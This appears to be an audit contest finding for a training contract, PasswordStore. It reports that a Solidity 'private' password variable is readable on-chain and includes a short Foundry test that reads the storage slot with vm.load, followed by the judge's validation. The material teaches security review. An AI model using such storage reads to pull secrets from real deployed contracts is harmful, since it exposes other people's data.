First Flight #1: PasswordStore
First Flight #1
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

s_password private state variable can be read on-chain

Heba

Summary

PassowrdStore:: s_password state variable is declared with private visibility modifier, which makes it vulnerable as all the data on-chain is public a malicious actor can get the password string which is supposed to be secret.

Vulnerability Details

PassowrdStore:: s_password

string private s_password;

Inthecode above the variable "s_password" is declared as private variable, and as it is a very important and sensitive variable for the contract it should not be visible for anyone but the contract owner.
But everything on-chain is public and this sensitive data can be compromised with unintended actor what makes it in real danger.

##POC
in PasswordStore.t.sol add the following test function which proves that contract storage cn be read even it is private

function test_non_owner_can_read_password() public{
bytes32 password = vm.load(address(passwordStore), bytes32(uint256(1)));
console.log(uint256(password));
}

Impact

all the funds in the contract are at risk if the password is revealed.

Tools Used

Manual review, Foundry

Recommendations

Avoid storing sensitive data on-chain or encrypt it before storing

Updates

Lead Judging Commences

inallhonesty Lead Judge
almost 2 years ago
inallhonesty Lead Judge almost 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-anyone-can-read-storage

Private functions and state variables are only visible for the contract they are defined in and not in derived contracts. In this case private doesn't mean secret/confidential

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.